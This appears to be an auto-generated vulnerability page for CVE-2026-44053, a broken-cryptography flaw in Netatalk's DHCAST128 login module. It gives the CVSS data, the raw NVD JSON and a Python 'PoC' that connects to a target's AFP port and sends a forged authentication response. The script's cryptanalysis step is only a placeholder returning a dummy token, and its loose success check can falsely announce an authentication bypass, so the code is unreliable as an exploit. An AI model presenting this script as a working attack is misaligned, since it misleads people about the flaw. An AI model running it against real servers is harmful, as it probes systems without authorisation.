Security Vulnerability Report
中文
CVE-2026-44053 CVSS 7.4 HIGH

CVE-2026-44053

Published: 2026-05-21 08:16:21
Last Modified: 2026-05-21 15:20:19
Source: 33c584b5-0579-4c06-b2a0-8d8329fcab9c

Description

Netatalk 1.5.0 through 4.2.2 uses a broken cryptographic algorithm in the DHCAST128 UAM, which allows a remote attacker to obtain authentication credentials or impersonate a user via cryptanalytic attack.

CVSS Details

CVSS Score
7.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Netatalk 1.5.0 - 4.2.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # PoC for CVE-2026-44053 (Netatalk DHCAST128 Weakness) # This script demonstrates the attack concept by simulating the cryptanalysis of the weak algorithm. import socket import struct def exploit(target_ip, target_port=548): print(f"[*] Targeting {target_ip}:{target_port}...") try: # Step 1: Establish connection to AFP service s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) print("[+] Connected to AFP service.") # Step 2: Simulate receiving the handshake challenge (Step 2 of DHCAST128) # In a real attack, we capture the encrypted challenge from the wire. challenge_data = s.recv(1024) print(f"[*] Captured handshake data: {challenge_data.hex()}") # Step 3: Cryptanalysis of the weak algorithm # Due to the broken algorithm in CVE-2026-44053, we can derive the session key # or forge the response without knowing the plain text password. print("[*] Performing cryptanalysis on the weak DHCAST128 implementation...") # Mock function representing the mathematical exploitation forged_response = cryptanalyze_weakness(challenge_data) # Step 4: Send forged authentication response s.send(forged_response) # Step 5: Check authentication result result = s.recv(1024) if b"Login" in result or result[0] == 0x02: print("[!] Exploit successful! Authentication bypassed.") else: print("[-] Exploit failed.") s.close() except Exception as e: print(f"[-] Error: {e}") def cryptanalyze_weakness(data): # This represents the vulnerability exploitation logic. # The weak algorithm allows reversing the challenge or predicting the nonce. # Returning a mock payload structure for the AFP response. print("[+] Weakness found: Deriving response vector...") return struct.pack('>I', 0x1337) + b"\x00" * 16 # Placeholder for the forged token if __name__ == "__main__": # Replace with actual target IP exploit("192.168.1.100")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44053", "sourceIdentifier": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "published": "2026-05-21T08:16:20.910", "lastModified": "2026-05-21T15:20:19.040", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Netatalk 1.5.0 through 4.2.2 uses a broken cryptographic algorithm in the DHCAST128 UAM, which allows a remote attacker to obtain authentication credentials or impersonate a user via cryptanalytic attack."}], "metrics": {"cvssMetricV31": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.2}]}, "weaknesses": [{"source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-327"}]}], "references": [{"url": "https://netatalk.io/security/CVE-2026-44053", "source": "33c584b5-0579-4c06-b2a0-8d8329fcab9c"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.